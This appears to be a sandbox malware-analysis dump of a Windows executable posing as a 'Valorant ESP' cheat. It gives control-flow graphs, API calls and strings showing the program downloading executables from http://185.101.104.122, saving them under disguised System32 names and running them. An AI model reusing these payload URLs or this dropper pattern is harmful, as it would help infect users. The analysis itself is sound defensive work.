7ff7e59f1a70 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 * 2 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 * 2 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 GetStdHandle SetConsoleTextAttribute call 7ff7e59f1a70 ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z 878->887 880 7ff7e59f1664-7ff7e59f1677 879->880 881 7ff7e59f1680 call 7ff7e5a3f22c 879->881 880->881 885 7ff7e59f1679-7ff7e59f167f _invalid_parameter_noinfo_noreturn 880->885 881->878 888 7ff7e59f1629-7ff7e59f162d 883->888 884->888 885->881 923 7ff7e59f1982-7ff7e59f1985 887->923 924 7ff7e59f1909-7ff7e59f1981 call 7ff7e59e3d30 * 2 call 7ff7e59e3b10 * 2 URLDownloadToFileA system * 2 Sleep exit 887->924 888->877 891 7ff7e59f162f 888->891 891->875 925 7ff7e59f1a00-7ff7e59f1a08 923->925 926 7ff7e59f1987-7ff7e59f19ff call 7ff7e59e3d30 * 2 call 7ff7e59e3b10 * 2 URLDownloadToFileA system * 2 Sleep exit 923->926 924->923 930 7ff7e59f1a3e-7ff7e59f1a60 call 7ff7e5a3f580 925->930 931 7ff7e59f1a0a-7ff7e59f1a1b 925->931 926->925 935 7ff7e59f1a1d-7ff7e59f1a30 931->935 936 7ff7e59f1a39 call 7ff7e5a3f22c 931->936 935->936 940 7ff7e59f1a32-7ff7e59f1a38 _invalid_parameter_noinfo_noreturn 935->940 936->930 940->936
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: Console$AttributeHandleText$Windowsystem$rand$DownloadFileLongSleep_invalid_parameter_noinfo_noreturnexit$??5?$basic_istream@AttributesD@std@@@std@@LayeredTitleU?$char_traits@V01@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                            • String ID: Iniciar Valorant ESP (HVCI DESLIGADO): $ Iniciar Valorant ESP (HVCI HABILITADO): $ Selecione a opcao: $##########################################################$##########################################################$.exe$C:\Windows\System32\SeieHuSttinstialog.exe$C:\Windows\System32\SeuetingsHostialog.exe$[ Selecione uma opcao: ]$cd C:\$http://185.101.104.122/esphvciforabronkz.exe$http://185.101.104.122/esphvcionbronkz.exe$start C:\Windows\System32\SeieHuSttinstialog.exe$start C:\Windows\System32\SeuetingsHostialog.exe
                                            • API String ID: 2233566951-2931392240
                                            • Opcode ID: 13f08ad738c38134cd58ba64b4e898b23d3fc82a5f16b95eb77ab26870e295f7
                                            • Instruction ID: 947192628a4aedd24d621e059a2c06e89d056627a74303dae89c2540a73e5d9d
                                            • Opcode Fuzzy Hash: 13f08ad738c38134cd58ba64b4e898b23d3fc82a5f16b95eb77ab26870e295f7
                                            • Instruction Fuzzy Hash: 24E15621F0864B86EB00BBA0D874AB8A761AF85F94F804236D51EC66F5DF3CE549C371

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 951 7ff7e5a08980-7ff7e5a0899c 952 7ff7e5a0899e-7ff7e5a089b0 WSAStartup 951->952 953 7ff7e5a089e6-7ff7e5a089ed call 7ff7e5a32480 951->953 954 7ff7e5a089c9-7ff7e5a089e5 call 7ff7e5a3f580 952->954 955 7ff7e5a089b2-7ff7e5a089b9 952->955 962 7ff7e5a08caf-7ff7e5a08cc6 call 7ff7e5a3f580 953->962 963 7ff7e5a089f3-7ff7e5a08a20 GetModuleHandleA 953->963 957 7ff7e5a089bb-7ff7e5a089c1 955->957 958 7ff7e5a089c3 WSACleanup 955->958 957->953 957->958 958->954 965 7ff7e5a08a2e-7ff7e5a08a63 GetProcAddress strpbrk 963->965 966 7ff7e5a08a22-7ff7e5a08a29 963->966 969 7ff7e5a08a8b-7ff7e5a08a8e 965->969 970 7ff7e5a08a65-7ff7e5a08a6b 965->970 968 7ff7e5a08bb3-7ff7e5a08ca7 VerSetConditionMask * 5 VerifyVersionInfoA QueryPerformanceFrequency 966->968 968->962 971 7ff7e5a08aba-7ff7e5a08ad1 GetSystemDirectoryA 969->971 972 7ff7e5a08a90-7ff7e5a08aa3 GetProcAddress 969->972 973 7ff7e5a08a7d-7ff7e5a08a86 LoadLibraryA 970->973 974 7ff7e5a08a6d-7ff7e5a08a78 970->974 977 7ff7e5a08ad7-7ff7e5a08aea malloc 971->977 978 7ff7e5a08b72 971->978 972->971 976 7ff7e5a08aa5-7ff7e5a08ab5 LoadLibraryExA 972->976 975 7ff7e5a08b7a-7ff7e5a08b8c 973->975 974->975 975->968 979 7ff7e5a08b8e-7ff7e5a08bac GetProcAddress 975->979 976->975 980 7ff7e5a08b69-7ff7e5a08b6c free 977->980 981 7ff7e5a08aec-7ff7e5a08afa GetSystemDirectoryA 977->981 978->975 979->968 980->978 981->980 983 7ff7e5a08afc-7ff7e5a08b06 981->983 984 7ff7e5a08b10-7ff7e5a08b19 983->984 984->984 985 7ff7e5a08b1b-7ff7e5a08b20 984->985 986 7ff7e5a08b24-7ff7e5a08b2b 985->986 986->986 987 7ff7e5a08b2d-7ff7e5a08b36 986->987 988 7ff7e5a08b40-7ff7e5a08b4c 987->988 988->988 989 7ff7e5a08b4e-7ff7e5a08b54 988->989 990 7ff7e5a08b60 LoadLibraryA 989->990 991 7ff7e5a08b56-7ff7e5a08b5e 989->991 992 7ff7e5a08b66 990->992 991->992 992->980
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ConditionMask$AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleInfoModulePerformanceQueryStartupVerifyVersionfreemallocstrpbrk
                                            • String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
                                            • API String ID: 2612373469-2794540096
                                            • Opcode ID: 372a1b11eae873ffce80445b4ce260fa558d07d99fefe9c51babf47caa90135e
                                            • Instruction ID: d7581dd5e1cd7ec6c95d54c2b7449d576e92811bf149a6e5bbe24b3a6117559f
                                            • Opcode Fuzzy Hash: 372a1b11eae873ffce80445b4ce260fa558d07d99fefe9c51babf47caa90135e
                                            • Instruction Fuzzy Hash: E791A221B1978B86EB60BB61A420BB9AB91FF89F84F844136C94D87754EF7CE0458721

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1248 7ff7e5a07cc0-7ff7e5a07d2d 1249 7ff7e5a07d32-7ff7e5a07d42 1248->1249 1250 7ff7e5a07d2f 1248->1250 1251 7ff7e5a07d44-7ff7e5a07d4c 1249->1251 1252 7ff7e5a07d51-7ff7e5a07d69 memcpy 1249->1252 1250->1249 1251->1252 1253 7ff7e5a07d6b-7ff7e5a07d96 call 7ff7e59f6290 * 2 1252->1253 1254 7ff7e5a07d98-7ff7e5a07dab socket 1252->1254 1255 7ff7e5a07dae-7ff7e5a07dba 1253->1255 1254->1255 1258 7ff7e5a07dc0-7ff7e5a07dc8 1255->1258 1259 7ff7e5a0824f 1255->1259 1261 7ff7e5a07dca-7ff7e5a07dd2 call 7ff7e5a14c90 1258->1261 1262 7ff7e5a07dd7-7ff7e5a07de0 1258->1262 1260 7ff7e5a08254-7ff7e5a0827d call 7ff7e5a3f580 1259->1260 1261->1262 1266 7ff7e5a07de2-7ff7e5a07ded 1262->1266 1267 7ff7e5a07df0-7ff7e5a07df9 1262->1267 1266->1267 1270 7ff7e5a07e0c-7ff7e5a07e10 1267->1270 1271 7ff7e5a07dfb-7ff7e5a07dfe 1267->1271 1272 7ff7e5a07e15-7ff7e5a07e27 call 7ff7e5a311c0 1270->1272 1274 7ff7e5a07e04-7ff7e5a07e0a 1271->1274 1275 7ff7e5a081fa-7ff7e5a0824d _errno * 3 call 7ff7e59f2500 call 7ff7e5a05970 call 7ff7e5a065d0 1271->1275 1272->1275 1280 7ff7e5a07e2d-7ff7e5a07e55 htons call 7ff7e5a05af0 1272->1280 1274->1272 1275->1260 1286 7ff7e5a07e5c-7ff7e5a07e61 1280->1286 1287 7ff7e5a07e57-7ff7e5a07e5a 1280->1287 1289 7ff7e5a07ece 1286->1289 1290 7ff7e5a07e63-7ff7e5a07e6d 1286->1290 1287->1286 1287->1289 1291 7ff7e5a07ed1-7ff7e5a07eed 1289->1291 1290->1291 1292 7ff7e5a07e6f-7ff7e5a07e9b setsockopt 1290->1292 1293 7ff7e5a07eef-7ff7e5a07f03 call 7ff7e5a08800 1291->1293 1294 7ff7e5a07f1d-7ff7e5a07f20 1291->1294 1295 7ff7e5a07e9d-7ff7e5a07ec4 WSAGetLastError call 7ff7e59f2500 call 7ff7e5a05af0 1292->1295 1296 7ff7e5a07ec9-7ff7e5a07ecc 1292->1296 1307 7ff7e5a07f05-7ff7e5a07f0f 1293->1307 1308 7ff7e5a07f11-7ff7e5a07f1b 1293->1308 1298 7ff7e5a07f74-7ff7e5a07f77 1294->1298 1299 7ff7e5a07f22-7ff7e5a07f47 getsockopt 1294->1299 1295->1296 1296->1291 1304 7ff7e5a0805f-7ff7e5a08066 1298->1304 1305 7ff7e5a07f7d-7ff7e5a07f84 1298->1305 1302 7ff7e5a07f53-7ff7e5a07f6e setsockopt 1299->1302 1303 7ff7e5a07f49-7ff7e5a07f51 1299->1303 1302->1298 1303->1298 1303->1302 1309 7ff7e5a0809a-7ff7e5a080a1 1304->1309 1310 7ff7e5a08068-7ff7e5a08095 call 7ff7e59f6290 * 2 1304->1310 1305->1304 1311 7ff7e5a07f8a-7ff7e5a07fb5 setsockopt 1305->1311 1307->1298 1308->1299 1313 7ff7e5a080a3-7ff7e5a080a6 1309->1313 1314 7ff7e5a080a8-7ff7e5a080c8 call 7ff7e5a31130 call 7ff7e5a07630 1309->1314 1343 7ff7e5a080e5-7ff7e5a080e7 1310->1343 1344 7ff7e5a08097 1310->1344 1316 7ff7e5a07fce-7ff7e5a08042 call 7ff7e5a08370 * 2 WSAIoctl 1311->1316 1317 7ff7e5a07fb7-7ff7e5a07fc9 call 7ff7e5a05af0 1311->1317 1313->1314 1319 7ff7e5a080fe-7ff7e5a08128 call 7ff7e5a14c90 call 7ff7e5a0d7b0 1313->1319 1314->1319 1337 7ff7e5a080ca-7ff7e5a080d8 call 7ff7e5a065d0 1314->1337 1316->1304 1336 7ff7e5a08044-7ff7e5a0805a WSAGetLastError call 7ff7e5a05af0 1316->1336 1317->1304 1339 7ff7e5a0812a-7ff7e5a0813a call 7ff7e59f57f0 1319->1339 1340 7ff7e5a0813f-7ff7e5a08142 1319->1340 1336->1304 1337->1259 1351 7ff7e5a080de-7ff7e5a080e0 1337->1351 1339->1340 1346 7ff7e5a08148-7ff7e5a08150 1340->1346 1347 7ff7e5a081ef-7ff7e5a081f8 1340->1347 1343->1309 1349 7ff7e5a080e9-7ff7e5a080f9 call 7ff7e5a065d0 1343->1349 1344->1309 1346->1347 1350 7ff7e5a08156-7ff7e5a0815d 1346->1350 1347->1260 1349->1260 1353 7ff7e5a08188-7ff7e5a08193 WSAGetLastError 1350->1353 1354 7ff7e5a0815f-7ff7e5a08174 connect 1350->1354 1351->1260 1357 7ff7e5a081e2-7ff7e5a081e4 1353->1357 1358 7ff7e5a08195-7ff7e5a0819e 1353->1358 1354->1353 1356 7ff7e5a08176-7ff7e5a08178 1354->1356 1359 7ff7e5a081eb-7ff7e5a081ed 1356->1359 1360 7ff7e5a0817a-7ff7e5a08183 1356->1360 1357->1359 1358->1357 1361 7ff7e5a081a0-7ff7e5a081e0 call 7ff7e59f2500 call 7ff7e5a05af0 call 7ff7e5a065d0 1358->1361 1359->1260 1360->1260 1361->1260
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast$setsockopt$fwrite$CounterIoctlPerformanceQuery_errnoclosesocketconnectgetsockopthtonsioctlsocketmemcpysocket
                                            • String ID: Trying %s:%ld...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                            • API String ID: 3453287622-3868455274
                                            • Opcode ID: 4332ac8226c2ecdce437c53bd151d02491bb9bbcc8a49051d32adef8a4035693
                                            • Instruction ID: ea0e8483d3666759306bf5c28a3d94fd54ffff9b21b922b3d78c9777f0655cef
                                            • Opcode Fuzzy Hash: 4332ac8226c2ecdce437c53bd151d02491bb9bbcc8a49051d32adef8a4035693
                                            • Instruction Fuzzy Hash: 8EF1D271B1828A86E710AB35D464BBEAB90FF44F88F804036DA4DC7695DF7CE545CB22

                                            Control-flow Graph

                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,?,00007FF7E5A324BA,?,?,?,?,00007FF7E5A089EB), ref: 00007FF7E5A08674
                                            • GetProcAddress.KERNEL32(?,?,00007FF7E5A324BA,?,?,?,?,00007FF7E5A089EB), ref: 00007FF7E5A08699
                                            • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00007FF7E5A324BA,?,?,?,?,00007FF7E5A089EB), ref: 00007FF7E5A086AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcstrpbrk
                                            • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                                            • API String ID: 27745253-3327535076
                                            • Opcode ID: 230c0ed0a1b2d880a65c49ba9e4704915758f5ad6352508eade00287004d952d
                                            • Instruction ID: 359103fa047b4f43d9a3de21f54660026997f126d54d0f4a4ff2c8db50e855e2
                                            • Opcode Fuzzy Hash: 230c0ed0a1b2d880a65c49ba9e4704915758f5ad6352508eade00287004d952d
                                            • Instruction Fuzzy Hash: ED41E912B0964786FB05AF66A420639ABD1EF49FD5F884136CE0D83794DF3CD486C725

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1905 7ff7e5a14a60-7ff7e5a14aae socket 1906 7ff7e5a14ab0 1905->1906 1907 7ff7e5a14ab5-7ff7e5a14b0e htonl setsockopt 1905->1907 1908 7ff7e5a14c64-7ff7e5a14c82 call 7ff7e5a3f580 1906->1908 1909 7ff7e5a14c3b-7ff7e5a14c57 closesocket * 3 1907->1909 1910 7ff7e5a14b14-7ff7e5a14b29 bind 1907->1910 1913 7ff7e5a14c5c 1909->1913 1910->1909 1912 7ff7e5a14b2f-7ff7e5a14b45 getsockname 1910->1912 1912->1909 1915 7ff7e5a14b4b-7ff7e5a14b5a listen 1912->1915 1913->1908 1915->1909 1916 7ff7e5a14b60-7ff7e5a14b75 socket 1915->1916 1916->1909 1917 7ff7e5a14b7b-7ff7e5a14b90 connect 1916->1917 1917->1909 1918 7ff7e5a14b96-7ff7e5a14bac accept 1917->1918 1918->1909 1919 7ff7e5a14bb2-7ff7e5a14bce call 7ff7e5a08e80 1918->1919 1922 7ff7e5a14bd5-7ff7e5a14bdc 1919->1922 1922->1922 1923 7ff7e5a14bde-7ff7e5a14bf8 send 1922->1923 1923->1909 1924 7ff7e5a14bfa-7ff7e5a14c16 recv 1923->1924 1924->1909 1925 7ff7e5a14c18-7ff7e5a14c2c memcmp 1924->1925 1925->1909 1926 7ff7e5a14c2e-7ff7e5a14c39 closesocket 1925->1926 1926->1913
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: socket$acceptbindclosesocketconnectgetsocknamehtonllistenmemcmprecvsendsetsockopt
                                            • String ID:
                                            • API String ID: 3699910901-0
                                            • Opcode ID: 6e6282c668dcfc894862906e82aaace15aa8d0c260b38d1dd148d6634827d9ca
                                            • Instruction ID: d48eb5a31e90dcf14a13e31b4370b7713074347fe277a6f6d076f71574e2ed0d
                                            • Opcode Fuzzy Hash: 6e6282c668dcfc894862906e82aaace15aa8d0c260b38d1dd148d6634827d9ca
                                            • Instruction Fuzzy Hash: A3519F71708A4A82D710AF25E560A69B761EF84FB4F904336EA7E83AE4DF3CD4458711

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1927 7ff7e5a06980-7ff7e5a069cd 1928 7ff7e5a069cf-7ff7e5a069d3 1927->1928 1929 7ff7e5a069d8-7ff7e5a06a13 call 7ff7e5a0d7b0 1927->1929 1930 7ff7e5a06ef6-7ff7e5a06f14 call 7ff7e5a3f580 1928->1930 1935 7ff7e5a06a15 1929->1935 1936 7ff7e5a06a18-7ff7e5a06a1b 1929->1936 1935->1936 1937 7ff7e5a06a1d-7ff7e5a06a20 1936->1937 1938 7ff7e5a06a38 1936->1938 1940 7ff7e5a06a33-7ff7e5a06a36 1937->1940 1941 7ff7e5a06a22-7ff7e5a06a25 1937->1941 1939 7ff7e5a06a3b-7ff7e5a06a67 call 7ff7e5a0d840 1938->1939 1945 7ff7e5a06a82-7ff7e5a06a8a 1939->1945 1946 7ff7e5a06a69-7ff7e5a06a7d call 7ff7e5a05970 1939->1946 1940->1939 1941->1939 1943 7ff7e5a06a27-7ff7e5a06a31 1941->1943 1943->1939 1948 7ff7e5a06a8c-7ff7e5a06a9e call 7ff7e5a07b50 1945->1948 1949 7ff7e5a06ab9-7ff7e5a06ad7 1945->1949 1955 7ff7e5a06ee6-7ff7e5a06eee 1946->1955 1959 7ff7e5a06ab2-7ff7e5a06ab4 1948->1959 1960 7ff7e5a06aa0-7ff7e5a06aa2 1948->1960 1950 7ff7e5a06ae0-7ff7e5a06af5 1949->1950 1953 7ff7e5a06afb-7ff7e5a06b0f call 7ff7e5a15fe0 1950->1953 1954 7ff7e5a06d7a 1950->1954 1964 7ff7e5a06b15-7ff7e5a06b40 call 7ff7e5a0d840 1953->1964 1965 7ff7e5a06c90-7ff7e5a06c93 1953->1965 1958 7ff7e5a06d7e-7ff7e5a06d8f 1954->1958 1955->1930 1958->1950 1962 7ff7e5a06d95-7ff7e5a06d97 1958->1962 1959->1955 1960->1959 1963 7ff7e5a06aa4-7ff7e5a06aad call 7ff7e5a07c60 1960->1963 1966 7ff7e5a06d9d-7ff7e5a06db4 call 7ff7e5a08280 1962->1966 1967 7ff7e5a06edc 1962->1967 1963->1959 1979 7ff7e5a06b42-7ff7e5a06b54 call 7ff7e5a05af0 1964->1979 1980 7ff7e5a06b59-7ff7e5a06b5c 1964->1980 1971 7ff7e5a06c95-7ff7e5a06c9c 1965->1971 1972 7ff7e5a06d04-7ff7e5a06d4a SleepEx getsockopt 1965->1972 1983 7ff7e5a06dba-7ff7e5a06dc1 1966->1983 1984 7ff7e5a06e67-7ff7e5a06e69 1966->1984 1969 7ff7e5a06ede 1967->1969 1969->1955 1971->1972 1975 7ff7e5a06c9e-7ff7e5a06ca0 1971->1975 1977 7ff7e5a06d56 1972->1977 1978 7ff7e5a06d4c-7ff7e5a06d54 WSAGetLastError 1972->1978 1981 7ff7e5a06ca6-7ff7e5a06cec SleepEx getsockopt 1975->1981 1982 7ff7e5a06baf-7ff7e5a06bb1 1975->1982 1985 7ff7e5a06d5a-7ff7e5a06d5c 1977->1985 1978->1985 1979->1980 1992 7ff7e5a06b5e-7ff7e5a06b65 1980->1992 1993 7ff7e5a06bab 1980->1993 1988 7ff7e5a06cee-7ff7e5a06cf6 WSAGetLastError 1981->1988 1989 7ff7e5a06cfb-7ff7e5a06cff 1981->1989 1982->1954 1986 7ff7e5a06bb7-7ff7e5a06bcc WSASetLastError 1982->1986 1990 7ff7e5a06e6b-7ff7e5a06e72 1983->1990 1991 7ff7e5a06dc7-7ff7e5a06dce 1983->1991 1984->1969 1994 7ff7e5a06dd3-7ff7e5a06e21 1985->1994 1995 7ff7e5a06d5e-7ff7e5a06d64 1985->1995 1986->1954 1996 7ff7e5a06bd2-7ff7e5a06c3c call 7ff7e5a0eba0 call 7ff7e59f2500 call 7ff7e5a05af0 1986->1996 1988->1982 1989->1982 1997 7ff7e5a06e74-7ff7e5a06e7b 1990->1997 1998 7ff7e5a06e7d-7ff7e5a06e84 1990->1998 2000 7ff7e5a06e96-7ff7e5a06ed9 call 7ff7e59f2500 call 7ff7e5a05970 1991->2000 1992->1993 2001 7ff7e5a06b67-7ff7e5a06b93 call 7ff7e5a0d840 1992->2001 1993->1982 2002 7ff7e5a06e36-7ff7e5a06e4b call 7ff7e5a07b50 1994->2002 2003 7ff7e5a06e23-7ff7e5a06e2b call 7ff7e5a065d0 1994->2003 1995->1994 2004 7ff7e5a06d66-7ff7e5a06d75 call 7ff7e5a05af0 1995->2004 2030 7ff7e5a06c5e-7ff7e5a06c74 call 7ff7e5a08280 1996->2030 2031 7ff7e5a06c3e-7ff7e5a06c45 1996->2031 1997->2000 2008 7ff7e5a06e86-7ff7e5a06e8d 1998->2008 2009 7ff7e5a06e8f 1998->2009 2000->1967 2001->1993 2022 7ff7e5a06b95-7ff7e5a06ba6 call 7ff7e5a08280 2001->2022 2002->1969 2019 7ff7e5a06e51-7ff7e5a06e53 2002->2019 2003->2002 2004->1954 2008->2000 2009->2000 2019->1969 2024 7ff7e5a06e59-7ff7e5a06e62 call 7ff7e5a07c60 2019->2024 2022->1993 2024->1984 2036 7ff7e5a06c76-7ff7e5a06c81 2030->2036 2037 7ff7e5a06c87-7ff7e5a06c8b 2030->2037 2031->2030 2033 7ff7e5a06c47-7ff7e5a06c4e 2031->2033 2035 7ff7e5a06c50-7ff7e5a06c53 2033->2035 2035->2030 2038 7ff7e5a06c55-7ff7e5a06c5c 2035->2038 2036->1954 2036->2037 2037->1958 2038->2030 2038->2035
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: After %I64dms connect time, move on!$Connection failed$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                            • API String ID: 0-3307081561
                                            • Opcode ID: e2eedc7052c941d1432b2a018d79d9ac4f8581cfbb25bdcbeb98e85e99d6e6c7
                                            • Instruction ID: ecfe1b8a802655a8ccda63789f442555679eac4b2dd3dca8ff42f3f7fe3b2a56
                                            • Opcode Fuzzy Hash: e2eedc7052c941d1432b2a018d79d9ac4f8581cfbb25bdcbeb98e85e99d6e6c7
                                            • Instruction Fuzzy Hash: 93E10461B1868A82EB14AB34D464BB9ABA0FF49B9CF844237DA5D877C1DF3CE451C311

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 994 7ff7e59e2aa0-7ff7e59e2aef call 7ff7e59e2840 997 7ff7e59e2af5-7ff7e59e2afa 994->997 998 7ff7e59e30a8-7ff7e59e3117 call 7ff7e59e3120 Sleep exit 994->998 997->998 999 7ff7e59e2b00-7ff7e59e2c1e call 7ff7e59e3160 call 7ff7e59e3c30 call 7ff7e59e32d0 call 7ff7e59e3c30 call 7ff7e59e33d0 call 7ff7e59e3c30 997->999 1003 7ff7e59e3118-7ff7e59e311f call 7ff7e59e19f0 998->1003 1017 7ff7e59e2c54-7ff7e59e2c6d 999->1017 1018 7ff7e59e2c20-7ff7e59e2c31 999->1018 1021 7ff7e59e2ca5-7ff7e59e2cad 1017->1021 1022 7ff7e59e2c6f-7ff7e59e2c81 1017->1022 1019 7ff7e59e2c33-7ff7e59e2c46 1018->1019 1020 7ff7e59e2c4f call 7ff7e5a3f22c 1018->1020 1019->1020 1023 7ff7e59e2c48-7ff7e59e2c4e _invalid_parameter_noinfo_noreturn 1019->1023 1020->1017 1027 7ff7e59e2ce3-7ff7e59e2cfb 1021->1027 1028 7ff7e59e2caf-7ff7e59e2cc0 1021->1028 1025 7ff7e59e2c83-7ff7e59e2c96 1022->1025 1026 7ff7e59e2c9f-7ff7e59e2ca4 call 7ff7e5a3f22c 1022->1026 1023->1020 1025->1026 1031 7ff7e59e2c98-7ff7e59e2c9e _invalid_parameter_noinfo_noreturn 1025->1031 1026->1021 1029 7ff7e59e2d32-7ff7e59e2d3a 1027->1029 1030 7ff7e59e2cfd-7ff7e59e2d0e 1027->1030 1033 7ff7e59e2cc2-7ff7e59e2cd5 1028->1033 1034 7ff7e59e2cde call 7ff7e5a3f22c 1028->1034 1039 7ff7e59e2d70-7ff7e59e2db7 1029->1039 1040 7ff7e59e2d3c-7ff7e59e2d4d 1029->1040 1037 7ff7e59e2d10-7ff7e59e2d23 1030->1037 1038 7ff7e59e2d2c-7ff7e59e2d31 call 7ff7e5a3f22c 1030->1038 1031->1026 1033->1034 1035 7ff7e59e2cd7-7ff7e59e2cdd _invalid_parameter_noinfo_noreturn 1033->1035 1034->1027 1035->1034 1037->1038 1044 7ff7e59e2d25-7ff7e59e2d2b _invalid_parameter_noinfo_noreturn 1037->1044 1038->1029 1042 7ff7e59e2dc8-7ff7e59e2deb 1039->1042 1043 7ff7e59e2db9-7ff7e59e2dc6 1039->1043 1046 7ff7e59e2d4f-7ff7e59e2d62 1040->1046 1047 7ff7e59e2d6b call 7ff7e5a3f22c 1040->1047 1049 7ff7e59e2e1f-7ff7e59e2e22 1042->1049 1050 7ff7e59e2ded-7ff7e59e2df4 1042->1050 1048 7ff7e59e2e42-7ff7e59e2e5b call 7ff7e59e3550 call 7ff7e59e2840 1043->1048 1044->1038 1046->1047 1052 7ff7e59e2d64-7ff7e59e2d6a 